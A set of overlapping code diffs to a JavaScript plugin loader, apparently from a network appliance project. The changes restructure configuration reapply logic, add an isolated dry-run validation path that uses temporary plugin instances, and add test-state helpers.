-        for (let key of keys) {
-          if (value)
-            value = value[key];
-        }
-
-        if (value) {
-          for (let name in value) {
-            const instance = createPluginInstance(
-              pluginConf.category,
-              name,
-              pluginConf.c,
-              pluginConf.config,
-              workingPluginCategoryMap
-            );
-
-            if (!instance)
-              continue;
-
-            instance._mark = 1;
-
-            const oldConfig = instance.networkConfig;
-            if (oldConfig && !_isConfigEqual(oldConfig, value[name])) {
-              log.info(
-                `Network config of ${pluginConf.category}-->${name} changed`,
-                pluginConf.hide_config_in_log ? "hidden" : oldConfig,
-                pluginConf.hide_config_in_log ? "hidden" : value[name]
-              );
-
-              const changeType = instance.getConfigChangeType(value[name]);
-              instance.propagateConfigChanged(changeType);
-            }
-
-            // Dry-run must never expose the caller-owned configuration object
-            // to plugin lifecycle methods because configure() may mutate it.
-            instance._nextConfig = dryRun
-              ? _.cloneDeep(value[name])
-              : value[name];
-
-            if (!oldConfig) {
-              // initialization of network config, flush instance with new config
-              log.info(
-                `Initial setup of ${pluginConf.category}-->${name}`,
-                pluginConf.hide_config_in_log ? "hidden" : value[name]
-              );
-
-              instance.propagateConfigChanged(Plugin.CHANGE_FULL);
-              instance.unsubscribeAllChanges();
-            }
-
-            if (wlanReloaded && pluginConf.config_path === "interface.wlan") {
-              instance.propagateConfigChanged(Plugin.CHANGE_FULL);
-            }
-
-            newInstances[name] = instance;
-          }
-        }
-
         if (instances) {
-          const removedInstances = instances.filter(i => i._mark == 0);
           const promises = [];
-          for (let instance of removedInstances) {
+          for (let instance of instances) {
             if (concurrent) {
-              promises.push(remove(instance, pluginConf));
+              promises.push(flush(instance, pluginConf));
             } else {
-              await remove(instance, pluginConf);
+              await flush(instance, pluginConf);
             }
           }
 
           if (concurrent && !_.isEmpty(promises)) {
             if (!dryRun)
               log.info(
-                `Removing ${removedInstances.length} instances of ${pluginConf.category} in concurrent mode`
+                `Flushing instances of ${pluginConf.category} in concurrent mode`
               );
+
             await Promise.all(promises);
           }
         }
-
-        // merge with new pluginCategoryMap
-        newPluginCategoryMap[pluginConf.category] = Object.assign(
-          {},
-          newPluginCategoryMap[pluginConf.category],
-          newInstances
-        );
       }
-    } else {
-      newPluginCategoryMap = pluginCategoryMap;
-    }
 
-    const flush = async (instance, pluginConf) => {
-      if (!instance.networkConfig) // newly created instance
-        instance.configure(instance._nextConfig);
+      // apply plugin configs in ascending order by init sequence
+      if (!dryRun)
+        pluginConfs = reversedPluginConfs.reverse();
 
-      if (instance.isReapplyNeeded()) {
-        if (!dryRun) {
-          if (instance.isFlushNeeded(instance._nextConfig)) {
-            if (instance.isFullFlushNeeded(instance._nextConfig)) {
-              log.info("Flushing old config", pluginConf.category, instance.name);
-              await instance.flush();
-            } else {
-              log.info("Fast flushing old config", pluginConf.category, instance.name);
-              await instance.flushFast();
-            }
-          } else {
-            log.info(
-              "No need to flush old config",
-              pluginConf.category,
-              instance.name
+      // do not apply config in dry run
+      if (dryRun) {
+        applyInProgress = false;
+        lastAppliedTimestamp = Date.now() / 1000;
+        return errors;
+      }
+
+      const apply = async (instance, pluginConf) => {
+        if (instance.isReapplyNeeded()) {
+          log.info(
+            "Applying new config",
+            pluginConf.category,
+            instance.name
+          );
+          await instance.apply().catch((err) => {
+            log.error(
+              `Failed to apply config of ${pluginConf.category}-->${instance.name}`,
+              instance.networkConfig,
+              err
             );
-          }
+
+            errors.push(err.message || err);
+          });
 
           if (pluginConf.category === "apc") {
             CHANGE_FLAGS |= FLAG_APC_CHANGE;
@@ -346,135 +426,63 @@ async function reapply(config, dryRun = false) {
             if (pluginConf.category === "interface")
               CHANGE_FLAGS |= FLAG_IFACE_CHANGE;
           }
+        } else {
+          log.info(
+            "Instance config is not changed. No need to apply config",
+            pluginConf.category,
+            instance.name
+          );
         }
 
-        instance.unsubscribeAllChanges();
-      }
+        instance.propagateConfigChanged(Plugin.CHANGE_NONE);
+      };
 
-      if (config) {
-        // do not change config if config is not set
-        instance.configure(instance._nextConfig);
-      }
-    };
+      for (let pluginConf of pluginConfs) {
+        const concurrent = pluginConf.allow_concurrent;
 
-    // flush all changed plugins in descending order by init sequence
-    for (let pluginConf of reversedPluginConfs) {
-      const instances = Object.values(
-        newPluginCategoryMap[pluginConf.category]
-      ).filter(i => i.constructor.name === pluginConf.c.name);
+        const instances = Object.values(
+          newPluginCategoryMap[pluginConf.category]
+        ).filter(i => i.constructor.name === pluginConf.c.name);
 
-      const concurrent = pluginConf.allow_concurrent;
-
-      if (instances) {
-        const promises = [];
-        for (let instance of instances) {
-          if (concurrent) {
-            promises.push(flush(instance, pluginConf));
-          } else {
-            await flush(instance, pluginConf);
+        if (instances) {
+          const promises = [];
+          for (let instance of instances) {
+            if (concurrent) {
+              promises.push(apply(instance, pluginConf));
+            } else {
+              await apply(instance, pluginConf);
+            }
           }
-        }
 
-        if (concurrent && !_.isEmpty(promises)) {
-          if (!dryRun)
+          if (concurrent && !_.isEmpty(promises)) {
             log.info(
-              `Flushing instances of ${pluginConf.category} in concurrent mode`
+              `Applying instances of ${pluginConf.category} in concurrent mode`
             );
 
-          await Promise.all(promises);
-        }
-      }
-    }
-
-    // apply plugin configs in ascending order by init sequence
-    if (!dryRun)
-      pluginConfs = reversedPluginConfs.reverse();
-
-    // do not apply config in dry run
-    if (dryRun) {
-      applyInProgress = false;
-      lastAppliedTimestamp = Date.now() / 1000;
-      return errors;
-    }
-
-    const apply = async (instance, pluginConf) => {
-      if (instance.isReapplyNeeded()) {
-        log.info(
-          "Applying new config",
-          pluginConf.category,
-          instance.name
-        );
-        await instance.apply().catch((err) => {
-          log.error(
-            `Failed to apply config of ${pluginConf.category}-->${instance.name}`,
-            instance.networkConfig,
-            err
-          );
-
-          errors.push(err.message || err);
-        });
-
-        if (pluginConf.category === "apc") {
-          CHANGE_FLAGS |= FLAG_APC_CHANGE;
-        } else {
-          CHANGE_FLAGS |= FLAG_CHANGE;
-          if (pluginConf.category === "interface")
-            CHANGE_FLAGS |= FLAG_IFACE_CHANGE;
-        }
-      } else {
-        log.info(
-          "Instance config is not changed. No need to apply config",
-          pluginConf.category,
-          instance.name
-        );
-      }
-
-      instance.propagateConfigChanged(Plugin.CHANGE_NONE);
-    };
-
-    for (let pluginConf of pluginConfs) {
-      const concurrent = pluginConf.allow_concurrent;
-
-      const instances = Object.values(
-        newPluginCategoryMap[pluginConf.category]
-      ).filter(i => i.constructor.name === pluginConf.c.name);
-
-      if (instances) {
-        const promises = [];
-        for (let instance of instances) {
-          if (concurrent) {
-            promises.push(apply(instance, pluginConf));
-          } else {
-            await apply(instance, pluginConf);
+            await Promise.all(promises);
           }
         }
-
-        if (concurrent && !_.isEmpty(promises)) {
-          log.info(
-            `Applying instances of ${pluginConf.category} in concurrent mode`
-          );
-
-          await Promise.all(promises);
-        }
       }
+
+      pluginCategoryMap = newPluginCategoryMap;
+      applyInProgress = false;
+
+      // clear applyInProgress so that subsequent publish functions will send message to redis immediately
+      if (CHANGE_FLAGS & FLAG_CHANGE)
+        await publishChangeApplied();
+
+      if (CHANGE_FLAGS & FLAG_IFACE_CHANGE)
+        await publishIfaceChangeApplied();
+
+      if (CHANGE_FLAGS & FLAG_APC_CHANGE)
+        await publishAPCChangeApplied();
+
+      CHANGE_FLAGS = 0;
+      lastAppliedTimestamp = Date.now() / 1000;
+      return errors;
+    } finally {
+      activePluginCategoryMap = pluginCategoryMap || previousActivePluginCategoryMap;
     }
-
-    pluginCategoryMap = newPluginCategoryMap;
-    applyInProgress = false;
-
-    // clear applyInProgress so that subsequent publish functions will send message to redis immediately
-    if (CHANGE_FLAGS & FLAG_CHANGE)
-      await publishChangeApplied();
-
-    if (CHANGE_FLAGS & FLAG_IFACE_CHANGE)
-      await publishIfaceChangeApplied();
-
-    if (CHANGE_FLAGS & FLAG_APC_CHANGE)
-      await publishAPCChangeApplied();
-
-    CHANGE_FLAGS = 0;
-    lastAppliedTimestamp = Date.now() / 1000;
-    return errors;
   }).then((errors) => {
     applyInProgress = false;
     lastAppliedTimestamp = Date.now() / 1000;
@@ -505,6 +513,7 @@ function __setPluginConfsForTest(confs) {
 
 function __setPluginCategoryMapForTest(categoryMap) {
   pluginCategoryMap = categoryMap;
+  activePluginCategoryMap = categoryMap;
 }
 
 function scheduleReapply() {

--- a/plugins/plugin_loader.js
+++ b/plugins/plugin_loader.js
@@ -12,7 +12,6 @@
  *    You should have received a copy of the GNU Affero General Public License
  *    along with this program.  If not, see <http://www.gnu.org/licenses/>.
  */
-
 'use strict';
 
 const Plugin = require('./plugin.js');
@@ -26,7 +25,6 @@ let pluginCategoryMap = {};
 
 let scheduledReapplyTask = null;
 let restartRsyslogTask = null;
-
 const _ = require('lodash');
 const AsyncLock = require('async-lock');
 const exec = require('child-process-promise').exec;
@@ -50,7 +48,6 @@ async function initPlugins() {
   pluginConfs = config.plugins.sort((a, b) => {
     return a.init_seq - b.init_seq
   });
-
   for (let pluginConf of pluginConfs) {
     try {
       const filePath = pluginConf.file_path;
@@ -68,7 +65,6 @@ async function initPlugins() {
   await exec(`sudo systemctl daemon-reload`).catch((err) => {
     log.error(`Failed to reload systemctl daemon`, err.message);
   });
-
   log.info("Plugin initialized", pluginConfs);
 }
 
@@ -82,7 +78,6 @@ function createPluginInstance(category, name, constructor, config = null, plugin
 
   if (!constructor)
     return null;
-
   instance = new constructor(name);
   instance.name = name;
   pluginMap[category][name] = instance;
@@ -112,7 +107,6 @@ function _isConfigEqual(c1, c2) {
     delete c1Copy.meta["name"];
   if (c2Copy.meta && c2Copy.meta.name)
     delete c2Copy.meta["name"];
-
   // ignore extra data
   if (c1Copy.hasOwnProperty("extra"))
     delete c1Copy["extra"];
@@ -166,7 +160,7 @@ async function acquireApplyLock(func) {
   });
 }
 
-async function reapplyDryRun(config, errors, wlanReloaded) {
+async function reapplyDryRun(config, errors) {
   const dryRunPluginCategoryMap = {};
 
   for (const pluginConf of pluginConfs) {
@@ -187,7 +181,11 @@ async function reapplyDryRun(config, errors, wlanReloaded) {
     if (!value)
       continue;
 
+    const livePluginCategoryMap = pluginCategoryMap[pluginConf.category] || {};
+
     for (const name in value) {
+      const liveInstance = livePluginCategoryMap[name];
+
       const instance = createPluginInstance(
         pluginConf.category,
         name,
@@ -198,6 +196,14 @@ async function reapplyDryRun(config, errors, wlanReloaded) {
 
       if (!instance)
         continue;
+
+      /*
+       * Dry-run must validate changes against the currently active
+       * configuration, but it must never reuse the live plugin instance.
+       */
+      if (liveInstance && liveInstance.constructor === pluginConf.c && liveInstance.networkConfig) {
+        instance.networkConfig = JSON.parse(JSON.stringify(liveInstance.networkConfig));
+      }
 
       const oldConfig = instance.networkConfig;
 
@@ -213,13 +219,17 @@ async function reapplyDryRun(config, errors, wlanReloaded) {
         instance.unsubscribeAllChanges();
       }
 
-      if (wlanReloaded && pluginConf.config_path === "interface.wlan") {
-        instance.propagateConfigChanged(Plugin.CHANGE_FULL);
+      /*
+       * configure() is intentionally executed on the temporary instance.
+       * Plugin-specific configuration validation therefore still runs,
+       * while the live plugin object is never modified.
+       */
+      try {
+        await instance.configure(instance._nextConfig);
+      } catch (err) {
+        log.error(`Failed to validate config of ${pluginConf.category}-->${name}`, err);
+        errors.push(err.message || err);
       }
-
-      // Keep configure() in dry-run so plugin-specific configuration
-      // validation still occurs, but only on the temporary instance.
-      instance.configure(instance._nextConfig);
     }
   }
 
@@ -233,21 +243,27 @@ async function reapply(config, dryRun = false) {
     applyInProgress = true;
     const errors = [];
 
-    const country = _.get(config, ['apc', 'globalSysConfig', 'country']);
-    const wlanReloaded = await platform.prepareWLANRegDomainChange(country).catch((err) => {
-      log.error(`Failed to prepare WLAN reg domain change for country ${country}`, err);
-      errors.push(err.message || err);
-      return false;
-    });
+    /*
+     * prepareWLANRegDomainChange can perform platform-level work, so it
+     * must not run during a dry-run.
+     */
+    let wlanReloaded = false;
+    if (!dryRun) {
+      const country = _.get(config, ['apc', 'globalSysConfig', 'country']);
+      wlanReloaded = await platform.prepareWLANRegDomainChange(country).catch((err) => {
+        log.error(`Failed to prepare WLAN reg domain change for country ${country}`, err);
+        errors.push(err.message || err);
+        return false;
+      });
+    }
 
     if (dryRun) {
-      applyInProgress = false;
-      lastAppliedTimestamp = Date.now() / 1000;
-      return errors;
+      return await reapplyDryRun(config, errors);
     }
 
     let newPluginCategoryMap = {};
     const reversedPluginConfs = pluginConfs.reverse();
+
     // if config is not set, simply reapply effective config
     if (config) {
       // remove plugins in descending order by init sequence
@@ -256,47 +272,68 @@ async function reapply(config, dryRun = false) {
         instance.unsubscribeAllChanges();
         pluginCategoryMap && pluginCategoryMap[pluginConf.category] && delete pluginCategoryMap[pluginConf.category][instance.name];
       };
+
       for (let pluginConf of reversedPluginConfs) {
         const concurrent = pluginConf.allow_concurrent;
         newPluginCategoryMap[pluginConf.category] = newPluginCategoryMap[pluginConf.category] || {};
         if (!pluginConf.c)
           continue;
+
         const instances = Object.values(pluginCategoryMap[pluginConf.category]).filter(i => i.constructor.name === pluginConf.c.name);
+
         if (instances) {
           for (let instance of instances) {
             instance._mark = 0;
           }
-        } else pluginCategoryMap[pluginConf.category] = {};
+        } else
+          pluginCategoryMap[pluginConf.category] = {};
 
         const newInstances = {};
         const keys = pluginConf.config_path.split(".");
         let value = config;
+
         for (let key of keys) {
           if (value)
             value = value[key];
         }
+
         if (value) {
           for (let name in value) {
             const instance = createPluginInstance(pluginConf.category, name, pluginConf.c, pluginConf.config);
+
             if (!instance)
               continue;
+
             instance._mark = 1;
             const oldConfig = instance.networkConfig;
+
             if (oldConfig && !_isConfigEqual(oldConfig, value[name])) {
-              log.info(`Network config of ${pluginConf.category}-->${name} changed`, pluginConf.hide_config_in_log ? "hidden" : oldConfig, pluginConf.hide_config_in_log ? "hidden" : value[name]);
+              log.info(
+                `Network config of ${pluginConf.category}-->${name} changed`,
+                pluginConf.hide_config_in_log ? "hidden" : oldConfig,
+                pluginConf.hide_config_in_log ? "hidden" : value[name]
+              );
+
               const changeType = instance.getConfigChangeType(value[name]);
               instance.propagateConfigChanged(changeType);
             }
+
             instance._nextConfig = value[name];
+
             if (!oldConfig) {
               // initialization of network config, flush instance with new config
-              log.info(`Initial setup of ${pluginConf.category}-->${name}`, pluginConf.hide_config_in_log ? "hidden" : value[name]);
+              log.info(
+                `Initial setup of ${pluginConf.category}-->${name}`,
+                pluginConf.hide_config_in_log ? "hidden" : value[name]
+              );
               instance.propagateConfigChanged(Plugin.CHANGE_FULL);
               instance.unsubscribeAllChanges();
             }
+
             if (wlanReloaded && pluginConf.config_path === "interface.wlan") {
               instance.propagateConfigChanged(Plugin.CHANGE_FULL);
             }
+
             newInstances[name] = instance;
           }
         }
@@ -304,6 +341,7 @@ async function reapply(config, dryRun = false) {
         if (instances) {
           const removedInstances = instances.filter(i => i._mark == 0);
           const promises = [];
+
           for (let instance of removedInstances) {
             if (concurrent) {
               promises.push(remove(instance, pluginConf));
@@ -311,8 +349,14 @@ async function reapply(config, dryRun = false) {
               await remove(instance, pluginConf);
             }
           }
+
+          if (concurrent && !_.isEmpty(promises))
+            await Promise.all(promises);
+        }
+
         // merge with new pluginCategoryMap
-        newPluginCategoryMap[pluginConf.category] = Object.assign({}, newPluginCategoryMap[pluginConf.category], newInstances);
+        newPluginCategoryMap[pluginConf.category] =
+          Object.assign({}, newPluginCategoryMap[pluginConf.category], newInstances);
       }
     } else {
       newPluginCategoryMap = pluginCategoryMap;
@@ -321,9 +365,11 @@ async function reapply(config, dryRun = false) {
     const flush = async (instance, pluginConf) => {
       if (!instance.networkConfig) // newly created instance
         instance.configure(instance._nextConfig);
+
       if (instance.isReapplyNeeded()) {
         instance.unsubscribeAllChanges();
       }
+
       if (config) {
         // do not change config if config is not set
         instance.configure(instance._nextConfig);
@@ -332,10 +378,14 @@ async function reapply(config, dryRun = false) {
 
     // flush all changed plugins in descending order by init sequence
     for (let pluginConf of reversedPluginConfs) {
-      const instances = Object.values(newPluginCategoryMap[pluginConf.category]).filter(i => i.constructor.name === pluginConf.c.name);
+      const instances = Object.values(newPluginCategoryMap[pluginConf.category]).filter(
+        i => i.constructor.name === pluginConf.c.name
+      );
       const concurrent = pluginConf.allow_concurrent;
+
       if (instances) {
         const promises = [];
+
         for (let instance of instances) {
           if (concurrent) {
             promises.push(flush(instance, pluginConf));
@@ -343,9 +393,9 @@ async function reapply(config, dryRun = false) {
             await flush(instance, pluginConf);
           }
         }
+
         if (concurrent && !_.isEmpty(promises)) {
-          if (!dryRun)
-            log.info(`Flushing instances of ${pluginConf.category} in concurrent mode`);
+          log.info(`Flushing instances of ${pluginConf.category} in concurrent mode`);
           await Promise.all(promises);
         }
       }
@@ -353,37 +403,46 @@ async function reapply(config, dryRun = false) {
 
     // apply plugin configs in ascending order by init sequence
     pluginConfs = reversedPluginConfs.reverse();
-    // do not apply config in dry run
-    if (dryRun) {
-      applyInProgress = false;
-      lastAppliedTimestamp = Date.now() / 1000;
-      return errors;
-    }
+
     const apply = async (instance, pluginConf) => {
       if (instance.isReapplyNeeded()) {
         log.info("Applying new config", pluginConf.category, instance.name);
         await instance.apply().catch((err) => {
-          log.error(`Failed to apply config of ${pluginConf.category}-->${instance.name}`, instance.networkConfig, err);
+          log.error(
+            `Failed to apply config of ${pluginConf.category}-->${instance.name}`,
+            instance.networkConfig,
+            err
+          );
           errors.push(err.message || err);
         });
+
         if (pluginConf.category === "apc") {
           CHANGE_FLAGS |= FLAG_APC_CHANGE;
         } else {
           CHANGE_FLAGS |= FLAG_CHANGE;
-            if (pluginConf.category === "interface")
-              CHANGE_FLAGS |= FLAG_IFACE_CHANGE;
+          if (pluginConf.category === "interface")
+            CHANGE_FLAGS |= FLAG_IFACE_CHANGE;
         }
-
       } else {
-        log.info("Instance config is not changed. No need to apply config", pluginConf.category, instance.name);
+        log.info(
+          "Instance config is not changed. No need to apply config",
+          pluginConf.category,
+          instance.name
+        );
       }
+
       instance.propagateConfigChanged(Plugin.CHANGE_NONE);
     };
+
     for (let pluginConf of pluginConfs) {
       const concurrent = pluginConf.allow_concurrent;
-      const instances = Object.values(newPluginCategoryMap[pluginConf.category]).filter(i => i.constructor.name === pluginConf.c.name);
+      const instances = Object.values(newPluginCategoryMap[pluginConf.category]).filter(
+        i => i.constructor.name === pluginConf.c.name
+      );
+
       if (instances) {
         const promises = [];
+
         for (let instance of instances) {
           if (concurrent) {
             promises.push(apply(instance, pluginConf));
@@ -391,14 +450,17 @@ async function reapply(config, dryRun = false) {
             await apply(instance, pluginConf);
           }
         }
+
         if (concurrent && !_.isEmpty(promises)) {
           log.info(`Applying instances of ${pluginConf.category} in concurrent mode`);
           await Promise.all(promises);
         }
       }
     }
+
     pluginCategoryMap = newPluginCategoryMap;
     applyInProgress = false;
+
     // clear applyInProgress so that subsequent publish functions will send message to redis immediately
     if (CHANGE_FLAGS & FLAG_CHANGE)
       await publishChangeApplied();
@@ -406,14 +468,20 @@ async function reapply(config, dryRun = false) {
       await publishIfaceChangeApplied();
     if (CHANGE_FLAGS & FLAG_APC_CHANGE)
       await publishAPCChangeApplied();
+
     CHANGE_FLAGS = 0;
     lastAppliedTimestamp = Date.now() / 1000;
+
     return errors;
   }).then((errors) => {
     applyInProgress = false;
     lastAppliedTimestamp = Date.now() / 1000;
     t2 = Date.now() / 1000;
-    log.info(`reapply is complete ${_.isEmpty(errors) ? "without" : "with"} error, elapsed time: ${(t2 - t1).toFixed(3)}`);
+
+    log.info(
+      `reapply is complete ${_.isEmpty(errors) ? "without" : "with"} error, elapsed time: ${(t2 - t1).toFixed(3)}`
+    );
+
     return errors;
   }).catch((err) => {
     applyInProgress = false;
@@ -435,6 +503,7 @@ function scheduleReapply() {
 function scheduleRestartRsyslog() {
   if (restartRsyslogTask)
     clearTimeout(restartRsyslogTask);
+
   restartRsyslogTask = setTimeout(() => {
     exec(`sudo systemctl restart rsyslog`).catch((err) => {
       log.error("Failed to restart rsyslog", err.message);

--- a/plugins/plugin_loader.js
+++ b/plugins/plugin_loader.js
@@ -166,6 +166,66 @@ async function acquireApplyLock(func) {
   });
 }
 
+async function reapplyDryRun(config, errors, wlanReloaded) {
+  const dryRunPluginCategoryMap = {};
+
+  for (const pluginConf of pluginConfs) {
+    if (!pluginConf.c)
+      continue;
+
+    dryRunPluginCategoryMap[pluginConf.category] =
+      dryRunPluginCategoryMap[pluginConf.category] || {};
+
+    const keys = pluginConf.config_path.split(".");
+    let value = config;
+
+    for (const key of keys) {
+      if (value)
+        value = value[key];
+    }
+
+    if (!value)
+      continue;
+
+    for (const name in value) {
+      const instance = createPluginInstance(
+        pluginConf.category,
+        name,
+        pluginConf.c,
+        pluginConf.config,
+        dryRunPluginCategoryMap
+      );
+
+      if (!instance)
+        continue;
+
+      const oldConfig = instance.networkConfig;
+
+      if (oldConfig && !_isConfigEqual(oldConfig, value[name])) {
+        const changeType = instance.getConfigChangeType(value[name]);
+        instance.propagateConfigChanged(changeType);
+      }
+
+      instance._nextConfig = value[name];
+
+      if (!oldConfig) {
+        instance.propagateConfigChanged(Plugin.CHANGE_FULL);
+        instance.unsubscribeAllChanges();
+      }
+
+      if (wlanReloaded && pluginConf.config_path === "interface.wlan") {
+        instance.propagateConfigChanged(Plugin.CHANGE_FULL);
+      }
+
+      // Keep configure() in dry-run so plugin-specific configuration
+      // validation still occurs, but only on the temporary instance.
+      instance.configure(instance._nextConfig);
+    }
+  }
+
+  return errors;
+}
+
 async function reapply(config, dryRun = false) {
   let t1, t2;
   return await lock.acquire(LOCK_REAPPLY, async () => {

--- a/plugins/plugin_loader.js
+++ b/plugins/plugin_loader.js
@@ -13,7 +13,6 @@
  *    along with this program.  If not, see <http://www.gnu.org/licenses/>.
  */
 'use strict';
-
 const Plugin = require('./plugin.js');
 const log = require('../util/logger.js')(__filename);
 const config = require('../util/config.js').getConfig();
@@ -22,7 +21,6 @@ const Message = require('../core/Message.js');
 let pluginConfs = [];
 
 let pluginCategoryMap = {};
-
 let scheduledReapplyTask = null;
 let restartRsyslogTask = null;
 const _ = require('lodash');
@@ -34,7 +32,6 @@ const lock = new AsyncLock();
 const LOCK_REAPPLY = "LOCK_REAPPLY";
 let applyInProgress = false;
 let lastAppliedTimestamp = null;
-
 let CHANGE_FLAGS = 0;
 const FLAG_IFACE_CHANGE = 0x1;
 const FLAG_CHANGE = 0x2;
@@ -44,7 +41,6 @@ async function initPlugins() {
   if (_.isEmpty(config.plugins)) {
     return;
   }
-
   pluginConfs = config.plugins.sort((a, b) => {
     return a.init_seq - b.init_seq
   });
@@ -67,7 +63,6 @@ async function initPlugins() {
   });
   log.info("Plugin initialized", pluginConfs);
 }
-
 function createPluginInstance(category, name, constructor, config = null, pluginMap = pluginCategoryMap) {
   let instance = pluginMap[category] && pluginMap[category][name];
   if (instance)
@@ -75,7 +70,6 @@ function createPluginInstance(category, name, constructor, config = null, plugin
 
   if (!pluginMap[category])
     pluginMap[category] = {};
-
   if (!constructor)
     return null;
   instance = new constructor(name);
@@ -101,7 +95,6 @@ function _isConfigEqual(c1, c2) {
     return false;
   const c1Copy = JSON.parse(JSON.stringify(c1));
   const c2Copy = JSON.parse(JSON.stringify(c2));
-
   // ignore name change
   if (c1Copy.meta && c1Copy.meta.name)
     delete c1Copy.meta["name"];
@@ -117,7 +110,6 @@ function _isConfigEqual(c1, c2) {
     delete c1Copy.meta;
     delete c2Copy.meta;
   }
-
   return _.isEqual(c1Copy, c2Copy);
 }
 
@@ -169,7 +161,6 @@ async function reapplyDryRun(config, errors) {
 
     dryRunPluginCategoryMap[pluginConf.category] =
       dryRunPluginCategoryMap[pluginConf.category] || {};
-
     const keys = pluginConf.config_path.split(".");
     let value = config;
 
@@ -185,7 +176,6 @@ async function reapplyDryRun(config, errors) {
 
     for (const name in value) {
       const liveInstance = livePluginCategoryMap[name];
-
       const instance = createPluginInstance(
         pluginConf.category,
         name,
@@ -206,7 +196,6 @@ async function reapplyDryRun(config, errors) {
       }
 
       const oldConfig = instance.networkConfig;
-
       if (oldConfig && !_isConfigEqual(oldConfig, value[name])) {
         const changeType = instance.getConfigChangeType(value[name]);
         instance.propagateConfigChanged(changeType);
@@ -236,13 +225,30 @@ async function reapplyDryRun(config, errors) {
   return errors;
 }
 
+/*
+ * Test-only helper. This keeps tests from mutating the live plugin registry
+ * through getPluginInstances() while still allowing the dry-run path to be
+ * exercised with controlled plugin configurations.
+ */
+function _setPluginStateForTest(testPluginConfs, testPluginCategoryMap) {
+  const originalPluginConfs = pluginConfs;
+  const originalPluginCategoryMap = pluginCategoryMap;
+
+  pluginConfs = testPluginConfs;
+  pluginCategoryMap = testPluginCategoryMap;
+
+  return () => {
+    pluginConfs = originalPluginConfs;
+    pluginCategoryMap = originalPluginCategoryMap;
+  };
+}
+
 async function reapply(config, dryRun = false) {
   let t1, t2;
   return await lock.acquire(LOCK_REAPPLY, async () => {
     t1 = Date.now() / 1000;
     applyInProgress = true;
     const errors = [];
-
     /*
      * prepareWLANRegDomainChange can perform platform-level work, so it
      * must not run during a dry-run.
@@ -263,7 +269,6 @@ async function reapply(config, dryRun = false) {
 
     let newPluginCategoryMap = {};
     const reversedPluginConfs = pluginConfs.reverse();
-
     // if config is not set, simply reapply effective config
     if (config) {
       // remove plugins in descending order by init sequence
@@ -272,7 +277,6 @@ async function reapply(config, dryRun = false) {
         instance.unsubscribeAllChanges();
         pluginCategoryMap && pluginCategoryMap[pluginConf.category] && delete pluginCategoryMap[pluginConf.category][instance.name];
       };
-
       for (let pluginConf of reversedPluginConfs) {
         const concurrent = pluginConf.allow_concurrent;
         newPluginCategoryMap[pluginConf.category] = newPluginCategoryMap[pluginConf.category] || {};
@@ -280,7 +284,6 @@ async function reapply(config, dryRun = false) {
           continue;
 
         const instances = Object.values(pluginCategoryMap[pluginConf.category]).filter(i => i.constructor.name === pluginConf.c.name);
-
         if (instances) {
           for (let instance of instances) {
             instance._mark = 0;
@@ -296,7 +299,6 @@ async function reapply(config, dryRun = false) {
           if (value)
             value = value[key];
         }
-
         if (value) {
           for (let name in value) {
             const instance = createPluginInstance(pluginConf.category, name, pluginConf.c, pluginConf.config);
@@ -306,7 +308,6 @@ async function reapply(config, dryRun = false) {
 
             instance._mark = 1;
             const oldConfig = instance.networkConfig;
-
             if (oldConfig && !_isConfigEqual(oldConfig, value[name])) {
               log.info(
                 `Network config of ${pluginConf.category}-->${name} changed`,
@@ -317,7 +318,6 @@ async function reapply(config, dryRun = false) {
               const changeType = instance.getConfigChangeType(value[name]);
               instance.propagateConfigChanged(changeType);
             }
-
             instance._nextConfig = value[name];
 
             if (!oldConfig) {
@@ -329,7 +329,6 @@ async function reapply(config, dryRun = false) {
               instance.propagateConfigChanged(Plugin.CHANGE_FULL);
               instance.unsubscribeAllChanges();
             }
-
             if (wlanReloaded && pluginConf.config_path === "interface.wlan") {
               instance.propagateConfigChanged(Plugin.CHANGE_FULL);
             }
@@ -341,7 +340,6 @@ async function reapply(config, dryRun = false) {
         if (instances) {
           const removedInstances = instances.filter(i => i._mark == 0);
           const promises = [];
-
           for (let instance of removedInstances) {
             if (concurrent) {
               promises.push(remove(instance, pluginConf));
@@ -353,7 +351,6 @@ async function reapply(config, dryRun = false) {
           if (concurrent && !_.isEmpty(promises))
             await Promise.all(promises);
         }
-
         // merge with new pluginCategoryMap
         newPluginCategoryMap[pluginConf.category] =
           Object.assign({}, newPluginCategoryMap[pluginConf.category], newInstances);
@@ -365,7 +362,6 @@ async function reapply(config, dryRun = false) {
     const flush = async (instance, pluginConf) => {
       if (!instance.networkConfig) // newly created instance
         instance.configure(instance._nextConfig);
-
       if (instance.isReapplyNeeded()) {
         instance.unsubscribeAllChanges();
       }
@@ -375,7 +371,6 @@ async function reapply(config, dryRun = false) {
         instance.configure(instance._nextConfig);
       }
     };
-
     // flush all changed plugins in descending order by init sequence
     for (let pluginConf of reversedPluginConfs) {
       const instances = Object.values(newPluginCategoryMap[pluginConf.category]).filter(
@@ -385,7 +380,6 @@ async function reapply(config, dryRun = false) {
 
       if (instances) {
         const promises = [];
-
         for (let instance of instances) {
           if (concurrent) {
             promises.push(flush(instance, pluginConf));
@@ -400,10 +394,8 @@ async function reapply(config, dryRun = false) {
         }
       }
     }
-
     // apply plugin configs in ascending order by init sequence
     pluginConfs = reversedPluginConfs.reverse();
-
     const apply = async (instance, pluginConf) => {
       if (instance.isReapplyNeeded()) {
         log.info("Applying new config", pluginConf.category, instance.name);
@@ -415,7 +407,6 @@ async function reapply(config, dryRun = false) {
           );
           errors.push(err.message || err);
         });
-
         if (pluginConf.category === "apc") {
           CHANGE_FLAGS |= FLAG_APC_CHANGE;
         } else {
@@ -433,7 +424,6 @@ async function reapply(config, dryRun = false) {
 
       instance.propagateConfigChanged(Plugin.CHANGE_NONE);
     };
-
     for (let pluginConf of pluginConfs) {
       const concurrent = pluginConf.allow_concurrent;
       const instances = Object.values(newPluginCategoryMap[pluginConf.category]).filter(
@@ -442,7 +432,6 @@ async function reapply(config, dryRun = false) {
 
       if (instances) {
         const promises = [];
-
         for (let instance of instances) {
           if (concurrent) {
             promises.push(apply(instance, pluginConf));
@@ -460,7 +449,6 @@ async function reapply(config, dryRun = false) {
 
     pluginCategoryMap = newPluginCategoryMap;
     applyInProgress = false;
-
     // clear applyInProgress so that subsequent publish functions will send message to redis immediately
     if (CHANGE_FLAGS & FLAG_CHANGE)
       await publishChangeApplied();
@@ -471,7 +459,6 @@ async function reapply(config, dryRun = false) {
 
     CHANGE_FLAGS = 0;
     lastAppliedTimestamp = Date.now() / 1000;
-
     return errors;
   }).then((errors) => {
     applyInProgress = false;
@@ -479,7 +466,7 @@ async function reapply(config, dryRun = false) {
     t2 = Date.now() / 1000;
 
     log.info(
